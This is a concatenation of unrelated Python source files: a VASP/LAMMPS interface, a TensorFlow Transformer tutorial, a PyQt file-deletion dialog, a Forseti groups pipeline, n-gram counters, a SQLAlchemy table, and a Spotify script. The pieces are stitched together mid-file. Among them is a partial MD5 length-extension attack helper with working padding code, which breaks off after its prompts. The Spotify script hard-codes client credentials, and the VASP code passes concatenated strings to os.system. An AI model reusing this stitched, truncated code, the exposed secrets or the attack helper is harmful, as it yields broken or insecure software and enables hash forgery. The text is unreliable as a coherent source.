elements = []          # chemical symbols, one per LAMMPS atom type
def readVASP(inputFile):
    """Read the [VASP] section of *inputFile* into the module globals.

    Recognized keys (configparser lower-cases option names):
      binvasp  -- VASP executable name (stored in ``binVasp``)
      elements -- whitespace-separated chemical symbols (stored in ``elements``)

    Any other key prints a diagnostic and terminates via sys.exit(1).
    """
    global binVasp
    global elements
    # Read input data for the interface
    config = configparser.ConfigParser()
    config.read(inputFile)
    # Renamed from `vars`, which shadowed the builtin of the same name.
    params = config['VASP']
    for key in params:
        if key == 'binvasp':
            try:
                binVasp = str(params[key])
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are not swallowed.
            except Exception:
                print('Invalid value for variable: ' + key)
        elif key == 'elements':
            try:
                elements = params[key].split()
                print('elements found are:')
                print(elements)
            except Exception:
                print('Invalid value for variable: ' + key)
        else:
            # Unknown keys are treated as fatal configuration errors.
            print('Invalid variable: ' + key)
            sys.exit(1)
def compute(exec_cmd, training, numprocs):
    """Run a VASP single-point DFT calculation for snapshot *training*.

    Parameters
    ----------
    exec_cmd : str
        MPI launcher command (e.g. 'mpirun').  Renamed from ``exec``: `exec`
        is a Python keyword, so the original definition was a SyntaxError and
        the function could never be imported.
    training : int
        Index used to name the per-snapshot working directory DFT/dft<N>.
    numprocs : int
        Number of MPI ranks passed to the launcher's -n flag.
    """
    # Convert lammps data file to POSCAR file
    dftDir = 'DFT'
    os.makedirs(dftDir, exist_ok=True)
    computeDir = os.path.join(dftDir, 'dft' + str(training))
    # Seed the working directory with the template VASP input files.
    os.system('cp -r vaspInput ' + computeDir)
    lammps = lammpsdata.read_lammps_data('Restart/check.data', style='atomic')
    # Count lammps types and assign elements: after sorting, runs of equal
    # atomic numbers give the per-type atom counts.
    ids = lammps.get_atomic_numbers()
    ids.sort()
    amounts = []
    t = ids[0]
    count = 0
    for i in range(len(ids)):
        if ids[i] == t:
            count += 1
        else:
            amounts.append(count)
            count = 1
            t = ids[i]
    amounts.append(count)
    if len(amounts) != len(elements):
        print('Number of elements is not the same than number of types in LAMMPS')
        sys.exit(1)
    # Build an ASE symbols string like 'Si8O16' from elements x counts.
    symbols = ''
    for i in range(len(elements)):
        symbols += elements[i] + str(amounts[i])
    lammps.symbols = symbols
    os.chdir(computeDir)
    vasp.write_vasp('POSCAR', lammps)
    os.system(exec_cmd + ' -n ' + str(numprocs) + ' ' + binVasp + ' > out-dft.txt')
    # Return to the original working directory (two levels up from DFT/dft<N>).
    os.chdir('../..')
from tf2_models.attention.transformer import point_wise_feed_forward
from tf2_models.attention.transformer import transformer
from tf2_models.attention import masks
import tensorflow as tf
import tensorflow_datasets as tfds
import time
import numpy as np
import matplotlib.pyplot as plt
import logging
# Route TF's internal logger to INFO so pipeline progress is visible.
logger = tf.get_logger()
logger.setLevel(logging.INFO)
# Input-pipeline hyperparameters (from the official TF transformer tutorial).
MAX_LENGTH = 40      # drop examples longer than this many tokens
BUFFER_SIZE = 20000  # shuffle buffer for the training dataset
BATCH_SIZE = 64
EPOCHS = 20
def viz_point_wise_feed_forward():
    """Smoke-check the two position-wise feed-forward variants.

    Builds the dense FFN (d_model=512, dff=2048) and the 1-D conv variant
    (512, 1000), prints each one's output shape on a random (64, 50, 512)
    batch, then prints the equality comparison of the two layer objects.
    """
    ffn_layer = point_wise_feed_forward.point_wise_feed_forward_network(512, 2048)
    print(ffn_layer(tf.random.uniform((64, 50, 512))).shape)
    conv_layer = point_wise_feed_forward.point_wise_1d_conv(512, 1000)
    print(conv_layer(tf.random.uniform((64, 50, 512))).shape)
    print(conv_layer == ffn_layer)
def download_demo_data():
    """Download the TED pt->en translation set and build subword tokenizers.

    Returns (train_examples, val_examples, tokenizer_en, tokenizer_pt).

    NOTE(review): tfds.features.text.SubwordTextEncoder was deprecated and
    removed in later tensorflow_datasets releases -- confirm the pinned
    TFDS version before upgrading.
    """
    examples, metadata = tfds.load('ted_hrlr_translate/pt_to_en', with_info=True,
                                   as_supervised=True)
    train_examples, val_examples = examples['train'], examples['validation']
    # Build ~2**13-entry subword vocabularies from the training corpus.
    tokenizer_en = tfds.features.text.SubwordTextEncoder.build_from_corpus(
        (en.numpy() for pt, en in train_examples), target_vocab_size=2 ** 13)
    tokenizer_pt = tfds.features.text.SubwordTextEncoder.build_from_corpus(
        (pt.numpy() for pt, en in train_examples), target_vocab_size=2 ** 13)
    # Round-trip sanity check of the English tokenizer.
    sample_string = 'Transformer is awesome.'
    tokenized_string = tokenizer_en.encode(sample_string)
    print('Tokenized string is {}'.format(tokenized_string))
    original_string = tokenizer_en.decode(tokenized_string)
    print('The original string: {}'.format(original_string))
    assert original_string == sample_string
    # Show the subword that each token id maps to.
    for ts in tokenized_string:
        print('{} ----> {}'.format(ts, tokenizer_en.decode([ts])))
    # it = iter(train_examples)
    # ne = next(it)
    # print(ne)
    return train_examples, val_examples, tokenizer_en, tokenizer_pt
# Download data and build the tokenizers once, at import time (module-level
# side effect; the globals below are read by encode()/create_dataset()).
train_examples, val_examples, tokenizer_en, tokenizer_pt = download_demo_data()
def encode(lang1, lang2):
    """Add a start and end token to the input and target."""
    # vocab_size serves as the start-token id and vocab_size+1 as the
    # end-token id -- both indices sit just past the subword vocabulary.
    lang1 = [tokenizer_pt.vocab_size] + tokenizer_pt.encode(
        lang1.numpy()) + [tokenizer_pt.vocab_size + 1]
    lang2 = [tokenizer_en.vocab_size] + tokenizer_en.encode(
        lang2.numpy()) + [tokenizer_en.vocab_size + 1]
    return lang1, lang2
def tf_encode(pt, en):
    """Wrapper for tf.py_function.
    The tf.py_function will pass regular tensors (with a value and a .numpy()
    method to access it), to the wrapped python function
    """
    result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
    # py_function erases static shape information; re-declare both outputs as
    # rank-1 tensors of unknown length so downstream batching works.
    result_pt.set_shape([None])
    result_en.set_shape([None])
    return result_pt, result_en
def filter_max_length(x, y, max_length=MAX_LENGTH):
    """To keep this example small and relatively fast, drop examples with a
    length of over *max_length* (default 40) tokens."""
    x_is_short = tf.size(x) <= max_length
    y_is_short = tf.size(y) <= max_length
    return tf.logical_and(x_is_short, y_is_short)
def create_dataset():
    """Build the batched train/validation tf.data pipelines.

    Returns (train_dataset, val_dataset); both yield padded (pt, en) batches.
    """
    train_preprocessed = (
        train_examples
        .map(tf_encode)
        .filter(filter_max_length)
        # cache the dataset to memory to get a speedup while reading from it.
        .cache()
        .shuffle(BUFFER_SIZE))
    # Validation pipeline: no caching/shuffling needed.
    val_preprocessed = (
        val_examples
        .map(tf_encode)
        .filter(filter_max_length))
    #
    # Pad and batch examples togheter:
    #
    train_dataset = (train_preprocessed
                     .padded_batch(BATCH_SIZE, padded_shapes=([None], [None]))
                     .prefetch(tf.data.experimental.AUTOTUNE))
    val_dataset = (val_preprocessed
                   .padded_batch(BATCH_SIZE, padded_shapes=([None], [None])))
    # Peek at one validation batch as a sanity check.
    pt_batch, en_batch = next(iter(val_dataset))
    print("pt batch:\nshape: {}\n values: {}\n en batch:shape: {}\n values: {}\n".format(pt_batch.shape, pt_batch,
                                                                                         en_batch.shape, en_batch))
    return train_dataset, val_dataset
class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):
    """Transformer learning-rate schedule.

    Computes lr = d_model**-0.5 * min(step**-0.5, step * warmup_steps**-1.5):
    a linear warmup for the first *warmup_steps* steps followed by
    inverse-square-root decay.
    """
    def __init__(self, d_model, warmup_steps=4000):
        super(CustomSchedule, self).__init__()
        self.d_model = d_model
        # cast once so the rsqrt in __call__ operates in float32
        self.d_model = tf.cast(self.d_model, tf.float32)
        self.warmup_steps = warmup_steps
    def __call__(self, step):
        arg1 = tf.math.rsqrt(step)
        arg2 = step * (self.warmup_steps ** -1.5)
        return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)
def train_translation_model():
    """Train a Portuguese-to-English Transformer translation model.

    Follows the official TensorFlow Transformer tutorial: builds the
    tokenized datasets, constructs the Transformer, and runs a custom
    training loop with checkpointing every 5 epochs.

    Relies on module-level names: create_dataset, tokenizer_pt,
    tokenizer_en, transformer, masks, EPOCHS, plt, time.
    :return: None
    """
    # NOTE(review): val_dataset is currently unused in the training loop.
    train_dataset, val_dataset = create_dataset()
    # Model hyperparameters (smaller than the base Transformer, for speed).
    num_layers = 4
    d_model = 128
    dff = 512
    num_heads = 8
    # +2 reserves ids for the start and end tokens.
    input_vocab_size = tokenizer_pt.vocab_size + 2
    target_vocab_size = tokenizer_en.vocab_size + 2
    dropout_rate = 0.1
    learning_rate = CustomSchedule(d_model)
    optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98,
                                         epsilon=1e-9)
    # Plot the LR schedule for inspection (draws on the current matplotlib
    # figure; nothing is shown or saved here).
    temp_learning_rate_schedule = CustomSchedule(d_model)
    plt.plot(temp_learning_rate_schedule(tf.range(40000, dtype=tf.float32)))
    plt.ylabel("Learning Rate")
    plt.xlabel("Train Step")
    # reduction='none' keeps per-token losses so padding can be masked out.
    loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
        from_logits=True, reduction='none')
    # Since the target sequences are padded, it is important to apply a padding mask when calculating the loss.
    def loss_function(real, pred):
        # Mask positions where the target is the pad id (0) so padding does
        # not contribute to the mean loss.
        mask = tf.math.logical_not(tf.math.equal(real, 0))
        loss_ = loss_object(real, pred)
        mask = tf.cast(mask, dtype=loss_.dtype)
        loss_ *= mask
        return tf.reduce_sum(loss_) / tf.reduce_sum(mask)
    train_loss = tf.keras.metrics.Mean(name='train_loss')
    train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(
        name='train_accuracy')
    transformer_obj = transformer.Transformer(num_layers, d_model, num_heads, dff,
                                              input_vocab_size, target_vocab_size,
                                              pe_input=input_vocab_size,
                                              pe_target=target_vocab_size,
                                              rate=dropout_rate)
    def create_masks(inp, tar):
        # Encoder padding mask
        enc_padding_mask = masks.create_padding_mask(inp)
        # Used in the 2nd attention block in the decoder.
        # This padding mask is used to mask the encoder outputs.
        dec_padding_mask = masks.create_padding_mask(inp)
        # Used in the 1st attention block in the decoder.
        # It is used to pad and mask future tokens in the input received by
        # the decoder.
        look_ahead_mask = masks.create_look_ahead_mask(tf.shape(tar)[1])
        dec_target_padding_mask = masks.create_padding_mask(tar)
        combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)
        return enc_padding_mask, combined_mask, dec_padding_mask
    checkpoint_path = "./checkpoints/train"
    ckpt = tf.train.Checkpoint(transformer=transformer_obj,
                               optimizer=optimizer)
    ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)
    # if a checkpoint exists, restore the latest checkpoint.
    if ckpt_manager.latest_checkpoint:
        ckpt.restore(ckpt_manager.latest_checkpoint)
        print('Latest checkpoint restored!!')
    # The @tf.function trace-compiles train_step into a TF graph for faster
    # execution. The function specializes to the precise shape of the argument
    # tensors. To avoid re-tracing due to the variable sequence lengths or variable
    # batch sizes (the last batch is smaller), use input_signature to specify
    # more generic shapes.
    train_step_signature = [
        tf.TensorSpec(shape=(None, None), dtype=tf.int64),
        tf.TensorSpec(shape=(None, None), dtype=tf.int64),
    ]
    @tf.function(input_signature=train_step_signature)
    def train_step(inp, tar):
        # logger.info("inp: {}\n shape: {}\n".format(inp, inp.shape))
        # tf.print(inp)
        # logger.info("tar: {}\n shape: {}\n".format(tar, tar.shape))
        # tf.print(tar)
        # Teacher forcing: decoder input is the target shifted right, the
        # loss compares predictions against the target shifted left.
        tar_inp = tar[:, :-1]
        tar_real = tar[:, 1:]
        # logger.info("tar_inp: {}\n shape: {}\n".format(tar_inp, tar_inp.shape))
        # tf.print(tar_inp)
        # logger.info("tar_real: {}\n shape: {}\n".format(tar_real, tar_real.shape))
        # tf.print(tar_real)
        enc_padding_mask, combined_mask, dec_padding_mask = create_masks(inp, tar_inp)
        with tf.GradientTape() as tape:
            predictions, _ = transformer_obj(inp, tar_inp,
                                             True,
                                             enc_padding_mask,
                                             combined_mask,
                                             dec_padding_mask)
            loss = loss_function(tar_real, predictions)
        gradients = tape.gradient(loss, transformer_obj.trainable_variables)
        optimizer.apply_gradients(zip(gradients, transformer_obj.trainable_variables))
        train_loss(loss)
        train_accuracy(tar_real, predictions)
    for epoch in range(EPOCHS):
        start = time.time()
        train_loss.reset_states()
        train_accuracy.reset_states()
        # inp -> portuguese, tar -> english
        for (batch, (inp, tar)) in enumerate(train_dataset):
            train_step(inp, tar)
            if batch % 50 == 0:
                print('Epoch {} Batch {} Loss {:.4f} Accuracy {:.4f}'.format(
                    epoch + 1, batch, train_loss.result(), train_accuracy.result()))
        # Persist a checkpoint every 5 epochs.
        if (epoch + 1) % 5 == 0:
            ckpt_save_path = ckpt_manager.save()
            print('Saving checkpoint for epoch {} at {}'.format(epoch + 1,
                                                                ckpt_save_path))
        print('Epoch {} Loss {:.4f} Accuracy {:.4f}'.format(epoch + 1,
                                                            train_loss.result(),
                                                            train_accuracy.result()))
        print('Time taken for 1 epoch: {} secs\n'.format(time.time() - start))
# def evaluate(inp_sentence):
# start_token = [tokenizer_pt.vocab_size]
# end_token = [tokenizer_pt.vocab_size + 1]
#
# # inp sentence is portuguese, hence adding the start and end token
# inp_sentence = start_token + tokenizer_pt.encode(inp_sentence) + end_token
# encoder_input = tf.expand_dims(inp_sentence, 0)
#
# # as the target is english, the first word to the transformer should be the
# # english start token.
# decoder_input = [tokenizer_en.vocab_size]
# output = tf.expand_dims(decoder_input, 0)
#
# for i in range(MAX_LENGTH):
# enc_padding_mask, combined_mask, dec_padding_mask = create_masks(
# encoder_input, output)
#
# # predictions.shape == (batch_size, seq_len, vocab_size)
# predictions, attention_weights = transformer(encoder_input,
# output,
# False,
# enc_padding_mask,
# combined_mask,
# dec_padding_mask)
#
# # select the last word from the seq_len dimension
# predictions = predictions[:, -1:, :] # (batch_size, 1, vocab_size)
#
# predicted_id = tf.cast(tf.argmax(predictions, axis=-1), tf.int32)
#
# # return the result if the predicted_id is equal to the end token
# if predicted_id == tokenizer_en.vocab_size + 1:
# return tf.squeeze(output, axis=0), attention_weights
#
# # concatentate the predicted_id to the output which is given to the decoder
# # as its input.
# output = tf.concat([output, predicted_id], axis=-1)
#
# return tf.squeeze(output, axis=0), attention_weights
# create_dataset()
# logging.basicConfig(level=logging.INFO)
# NOTE(review): this starts training as a module-level side effect; consider
# guarding with `if __name__ == "__main__":` so importing stays side-effect free.
train_translation_model()
from hashlib import *
from pwn import p64
# Currently works only for md5 hashes
"""
Step 1: Get the values of data, append, length of the string from the user
Step 2: (i) Pad the secret+data with '1' and '0's such that the resultant length
becomes congruent to 56 modulus 64
(ii) Convert length of secret+data in bytes to bits and represent it in
64 bit little endian
Step 3: Send the padded secret+data to the server and get the hash (Let this
hash be h1)
Step 4: Append append_string to this hash and send the hash again to the server
Step 5: The output hash contains the secret. So we calculated the hash of a
string containing secret without actually knowing the secret
Moral of the story: Use HMAC
"""
# NOTE(review): obj1 is never used below; kept so any external importers of
# this name keep working.
obj1 = md5()
def padding(text):
    """Return *text* padded exactly as MD5 pads its input.

    The message is followed by a 0x80 byte, then zero bytes until the length
    is congruent to 56 modulo 64, then the original message length in *bits*
    as a 64-bit little-endian integer (completing a 64-byte block).

    The original implementation relied on the Python-2-only
    ``str.encode("hex")`` codec and on pwntools' ``p64``; this version uses
    ``struct`` and runs on both Python 2 and 3.

    :param text: str or bytes message to pad.
    :return: bytes, the padded message (a multiple of 64 bytes long).
    """
    import struct
    data = text if isinstance(text, bytes) else text.encode("latin-1")
    padded = data + b"\x80"
    # Zero-pad up to 8 bytes short of a 64-byte block boundary.
    while len(padded) % 64 != 56:
        padded += b"\x00"
    # Append the original length in bits, 64-bit little endian.
    padded += struct.pack("<Q", len(data) * 8)
    return padded
def hash_len_exploit():
    """Interactively collect the parameters for an MD5 length-extension attack.

    Prompts for the hash algorithm, the signed data, and the string to
    append. Only "md5" is currently supported; any other algorithm name is
    ignored.
    """
    # NOTE(review): the original wrapped this body in
    # `if '__name__' == '__main__':`, which compares two string literals and
    # is always False, so the function silently did nothing. The bogus guard
    # has been removed; callers invoke this function explicitly.
    hash_algo = raw_input("Enter the hashing algorithm: ")
    if hash_algo == "md5":
        data = raw_input("Enter the data to be signed: ")
        append = raw_input("Enter the string to be appended: ")
|
import GlobalSettings
import os
from PyQt5 import QtWidgets, Qt, uic
import traceback
import math
#global logger
# Shared application logger configured in GlobalSettings.
logger = GlobalSettings.logger
###########################################################
# closingWindow: this class is a little window where the user can select which files they want to delete
# Once they hit 'submit' it will delete all of the files selected, and close the program.
# If no files are selected, the program closes and no files are deleted
# Inputs are taking from the user (selecting files to delete and hitting submit), as well as GlobalSettings for the files in CSPR_DB
# Outputs are the files are deleting, and the program is closed
###########################################################
class closingWindow(QtWidgets.QMainWindow):
    """Small window letting the user pick files to delete before the program closes.

    The table is filled from GlobalSettings.CSPR_DB by get_files(); when the
    user hits 'submit' every selected file is removed from disk and the
    window closes. If nothing is selected, nothing is deleted.
    """
    def __init__(self):
        try:
            # qt stuff
            super(closingWindow, self).__init__()
            uic.loadUi(GlobalSettings.appdir + "closing_window.ui", self)
            self.setWindowTitle("Delete Files")
            self.setWindowIcon(Qt.QIcon(GlobalSettings.appdir + "cas9image.ico"))
            # button connections
            self.submit_button.clicked.connect(self.submit_and_close)
            # table stuff
            self.files_table.setColumnCount(1)
            self.files_table.setShowGrid(True)
            self.files_table.setHorizontalHeaderLabels("File Name;".split(";"))
            self.files_table.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
            self.files_table.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
            self.files_table.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)
            #scale UI
            self.scaleUI()
        except Exception as e:
            self._fatal_error("Error initializing closingWindow class.", e)

    # shared fatal-error path (previously copy-pasted in every method)
    def _fatal_error(self, context_message, error):
        """Log *error* with *context_message*, show a fatal-error dialog, and exit.

        Note: assumes self.fontSize has been set by scaleUI(), as in the
        original copy-pasted handlers.
        """
        logger.critical(context_message)
        logger.critical(error)
        logger.critical(traceback.format_exc())
        msgBox = QtWidgets.QMessageBox()
        msgBox.setStyleSheet("font: " + str(self.fontSize) + "pt 'Arial'")
        msgBox.setIcon(QtWidgets.QMessageBox.Icon.Critical)
        msgBox.setWindowTitle("Fatal Error")
        msgBox.setText("Fatal Error:\n"+str(error)+ "\n\nFor more information on this error, look at CASPER.log in the application folder.")
        msgBox.addButton(QtWidgets.QMessageBox.StandardButton.Close)
        msgBox.exec()
        exit(-1)

    #scale UI based on current screen
    def scaleUI(self):
        """Scale the font and window size for the current screen and center the window."""
        try:
            self.repaint()
            QtWidgets.QApplication.processEvents()
            screen = self.screen()
            dpi = screen.physicalDotsPerInch()
            width = screen.geometry().width()
            height = screen.geometry().height()
            # font scaling
            fontSize = 12
            self.fontSize = fontSize
            self.centralWidget().setStyleSheet("font: " + str(fontSize) + "pt 'Arial';")
            self.adjustSize()
            currentWidth = self.size().width()
            currentHeight = self.size().height()
            # window scaling
            # 1920x1080 => 1150x650
            scaledWidth = int((width * 400) / 1920)
            scaledHeight = int((height * 300) / 1080)
            # never shrink below the size Qt already needs for the widgets
            if scaledHeight < currentHeight:
                scaledHeight = currentHeight
            if scaledWidth < currentWidth:
                scaledWidth = currentWidth
            # center on the screen the cursor is currently on
            screen = QtWidgets.QApplication.desktop().screenNumber(QtWidgets.QApplication.desktop().cursor().pos())
            centerPoint = QtWidgets.QApplication.desktop().screenGeometry(screen).center()
            x = centerPoint.x() - (math.ceil(scaledWidth / 2))
            y = centerPoint.y() - (math.ceil(scaledHeight / 2))
            self.setGeometry(x, y, scaledWidth, scaledHeight)
            self.repaint()
            QtWidgets.QApplication.processEvents()
        except Exception as e:
            self._fatal_error("Error in scaleUI() in closing window.", e)

    #center UI on current screen
    def centerUI(self):
        """Re-center the window on the screen the cursor is currently on."""
        try:
            self.repaint()
            QtWidgets.QApplication.processEvents()
            #center window on current screen
            width = self.width()
            height = self.height()
            screen = QtWidgets.QApplication.desktop().screenNumber(QtWidgets.QApplication.desktop().cursor().pos())
            centerPoint = QtWidgets.QApplication.desktop().screenGeometry(screen).center()
            x = centerPoint.x() - (math.ceil(width / 2))
            y = centerPoint.y() - (math.ceil(height / 2))
            self.setGeometry(x, y, width, height)
            self.repaint()
            QtWidgets.QApplication.processEvents()
        except Exception as e:
            self._fatal_error("Error in centerUI() in closing window.", e)

    # this function will delete selected files, and then close the program
    def submit_and_close(self):
        """Delete every file currently selected in the table, then close the window."""
        try:
            # loop through the whole table
            for i in range(self.files_table.rowCount()):
                tabWidget = self.files_table.item(i, 0)
                # if that specific tab is selected, delete it. otherwise do nothing
                if tabWidget.isSelected():
                    os.remove(tabWidget.text())
            # close the program now
            self.close()
        except Exception as e:
            # NOTE(review): fixed the "sumbit_and_close" typo in this log message.
            self._fatal_error("Error in submit_and_close() in closing window.", e)

    # this function gets all of the files from the CSPR_DB and puts them all into the table
    def get_files(self):
        """Populate the table with every file name found in GlobalSettings.CSPR_DB."""
        try:
            loopCount = 0
            # get the file names from CSPR_DB
            files_names = os.listdir(GlobalSettings.CSPR_DB)
            files_names.sort(key=str.lower)
            self.files_table.setRowCount(len(files_names))
            # loop through and add them to the table
            for file in files_names:
                tabWidget = QtWidgets.QTableWidgetItem(file)
                self.files_table.setItem(loopCount, 0, tabWidget)
                loopCount += 1
            self.files_table.resizeColumnsToContents()
        except Exception as e:
            self._fatal_error("Error in get_files() in closing window.", e)
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pipeline to load GSuite Groups into Inventory."""
import json
from google.cloud.security.common.gcp_api import errors as api_errors
from google.cloud.security.common.util import log_util
from google.cloud.security.inventory import errors as inventory_errors
from google.cloud.security.inventory.pipelines import base_pipeline
# Module-level logger for this pipeline.
LOGGER = log_util.get_logger(__name__)
class LoadGroupsPipeline(base_pipeline.BasePipeline):
    """Pipeline to load groups data into Inventory."""

    RESOURCE_NAME = 'groups'

    def _transform(self, resource_from_api):
        """Yield an iterator of loadable groups.

        Args:
            resource_from_api (list): Group objects from the Admin SDK.

        Yields:
            iterable: Loadable groups as a per-group dictionary.
        """
        for group in resource_from_api:
            yield {'group_id': group.get('id'),
                   'group_email': group.get('email'),
                   'group_kind': group.get('kind'),
                   'direct_member_count': group.get('directMembersCount'),
                   # keep the raw payload for auditing/debugging
                   'raw_group': json.dumps(group)}

    def _retrieve(self):
        """Retrieve the groups from GSuite.

        Returns:
            list: Group list objects from the Admin SDK.

        Raises:
            LoadDataPipelineException: An error with loading data has occurred.
        """
        try:
            return self.api_client.get_groups()
        except api_errors.ApiExecutionError as e:
            raise inventory_errors.LoadDataPipelineError(e)

    def run(self):
        """Runs the load GSuite account groups pipeline."""
        groups_map = self._retrieve()
        if isinstance(groups_map, list):
            loadable_groups = self._transform(groups_map)
            self._load(self.RESOURCE_NAME, loadable_groups)
            self._get_loaded_count()
        else:
            # NOTE(review): Logger.warn is a deprecated alias; use warning().
            LOGGER.warning('No groups retrieved.')
|
########################################
# This script is a helpful tool for locating the position of the context corresponding to the question.
# Calculating N-gram language model probabilities of a context sentence.
import math
import sys
import operator
########################################
# Language model functions
def unigram(fileName):
    """Build a unigram count table from the text file *fileName*.

    Tokens are obtained by lower-casing each line and splitting on
    whitespace. Writes "word:probability" lines in descending frequency
    order, followed by the total token count, to output.txt.

    :param fileName: path of the corpus file to read.
    :return: (count, uniDic) where count is the total number of tokens and
        uniDic maps each token to its frequency.
    """
    uniDic = {}
    count = 0
    # `with` guarantees the files are closed; dict.has_key() was removed in
    # Python 3, so membership is tested with `in`.
    with open(fileName, 'r') as f:
        for line in f.readlines():
            line = line.lower().split()
            for word in line:
                count += 1
                if word in uniDic:
                    uniDic[word] += 1
                else:
                    uniDic[word] = 1
    sort = sorted(uniDic.items(), key=operator.itemgetter(1), reverse=True)
    with open('output.txt', 'w') as f1:
        for key in sort:
            # relative frequency of the word in the corpus
            f1.write(key[0] + ':' + str(float(key[1]) / count) + '\n')
        f1.write(str(count) + '\n')
    return count, uniDic
def bigram(fileName):
    """Build bigram counts from *fileName* and append probabilities to 'output'.

    Each line is lower-cased, split on whitespace, and prefixed with the
    sentence-start token "<s>". Bigrams are counted over positions
    1..len-2 (the final token of each line is deliberately skipped,
    matching the original behaviour). Appends "w1 w2:P(w2|w1)" lines
    sorted by descending probability, plus the number of distinct
    bigrams, to the file 'output'.

    :param fileName: path of the corpus file to read.
    :return: dict mapping "w1 w2" bigram strings to their counts.
    """
    biDic = {}
    uniDic = {}
    count = 0
    # dict.has_key() was removed in Python 3; use `in` instead.
    with open(fileName, 'r') as f:
        for line in f.readlines():
            line = line.lower().split()
            line.insert(0, "<s>")
            for i in range(1, len(line) - 1):
                biword = line[i - 1] + ' ' + line[i]
                if biword not in biDic:
                    # first sighting: one more *distinct* bigram
                    count += 1
                    biDic[biword] = 1
                    if line[i - 1] not in uniDic:
                        uniDic[line[i - 1]] = 1
                    else:
                        uniDic[line[i - 1]] += 1
                else:
                    biDic[biword] += 1
                    uniDic[line[i - 1]] += 1
    # conditional probability P(second | first) for every bigram
    s = {}
    for key in sorted(biDic.items(), key=operator.itemgetter(1), reverse=True):
        word = key[0].split()
        word.pop()
        myword = " ".join(word)
        s[key[0]] = float(key[1]) / uniDic[myword]
    with open('output', 'a') as f1:
        for key in sorted(s.items(), key=operator.itemgetter(1), reverse=True):
            f1.write(key[0] + ':' + str(key[1]) + '\n')
        f1.write(str(count) + '\n')
    return biDic
def trigram(fileName):
    """Build trigram counts from *fileName* and append probabilities to 'output'.

    Mirrors bigram(): lines are lower-cased and prefixed with "<s>", and
    trigrams are counted over positions 2..len-2 (the final token of each
    line is deliberately skipped, matching the original behaviour).
    Appends "w1 w2 w3:P(w3|w1 w2)" lines sorted by descending probability,
    plus the number of distinct trigrams, to the file 'output'.

    :param fileName: path of the corpus file to read.
    :return: dict mapping "w1 w2 w3" trigram strings to their counts.
    """
    biDic = {}
    triDic = {}
    count = 0
    # dict.has_key() was removed in Python 3; use `in` instead.
    with open(fileName, 'r') as f:
        for line in f.readlines():
            line = line.lower().split()
            line.insert(0, "<s>")
            for i in range(2, len(line) - 1):
                biword = line[i - 2] + ' ' + line[i - 1]
                triword = biword + ' ' + line[i]
                if triword not in triDic:
                    # first sighting: one more *distinct* trigram
                    count += 1
                    triDic[triword] = 1
                    if biword not in biDic:
                        biDic[biword] = 1
                    else:
                        biDic[biword] += 1
                else:
                    triDic[triword] += 1
                    biDic[biword] += 1
    # conditional probability P(third | first two) for every trigram
    s = {}
    for key in sorted(triDic.items(), key=operator.itemgetter(1), reverse=True):
        word = key[0].split()
        word.pop()
        myword = " ".join(word)
        s[key[0]] = float(key[1]) / biDic[myword]
    with open('output', 'a') as f1:
        for key in sorted(s.items(), key=operator.itemgetter(1), reverse=True):
            f1.write(key[0] + ':' + str(key[1]) + '\n')
        f1.write(str(count) + '\n')
    return triDic
#unigram(fileName)
#bigram(fileName)
#trigram(fileName)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
from web_backend.nvlserver.module import nvl_meta
from sqlalchemy import (
BigInteger, String, Column, Boolean, DateTime, Table, ForeignKey, func, LargeBinary, PrimaryKeyConstraint,
Numeric
)
from sqlalchemy.dialects.postgresql import JSONB
# Table of hardware commands issued by users to tracked hardware modules.
hw_command = Table(
    'user_hw_command',
    nvl_meta,
    Column('id', BigInteger, primary_key=True),
    Column('user_id', BigInteger, ForeignKey('user.id'), nullable=True),
    Column('hw_action_id', BigInteger, ForeignKey('hw_action.id'), nullable=True),
    Column('traceable_object_id', BigInteger, ForeignKey('traceable_object.id'), nullable=True),
    Column('hw_module_id', BigInteger, ForeignKey('hw_module.id'), nullable=True),
    # NOTE(review): the original declared 'proto_field' twice with identical
    # definitions; the duplicate has been removed (SQLAlchemy would warn and
    # keep only one of them anyway).
    Column('proto_field', String(length=255), nullable=False, default=''),
    Column('field_type', String(length=32), nullable=False, default=''),
    Column('state', String(length=32), nullable=False, default=''),
    Column('ack_message', Boolean, nullable=False, default=False),
    Column('active', Boolean, nullable=False),
    Column('deleted', Boolean, nullable=False),
    # validity window of the command
    Column('date_from', DateTime(timezone=True), server_default=func.now(), nullable=False),
    Column('date_to', DateTime(timezone=True), server_default=func.now(), nullable=False),
    # bookkeeping timestamps
    Column('created_on', DateTime(timezone=True), server_default=func.now(), nullable=False),
    Column('updated_on', DateTime(timezone=True), server_default=func.now(), onupdate=func.now(), nullable=False),
)
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 2 12:30:10 2021
@author: Victor
"""
import requests
import base64
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
def auth():
    """Return the module-level SpotifyClientCredentials manager.

    NOTE(review): relies on `auth_manager` being assigned later at module
    level; calling this before the module finishes importing raises NameError.
    """
    return auth_manager
# SECURITY(review): client credentials are hard-coded in source. Move them to
# environment variables or a config file and rotate these keys.
Client_ID = 'c6d7404e014a4395b773c3b3f4c50d95'
Client_Secret = '8004465dd19444eab523311469c7a065'
spotify_url = 'https://accounts.spotify.com/api/token'
# Manual client-credentials token request (demonstration of the raw OAuth
# exchange; spotipy's SpotifyClientCredentials below performs the same flow).
client_creds = f"{Client_ID}:{Client_Secret}"
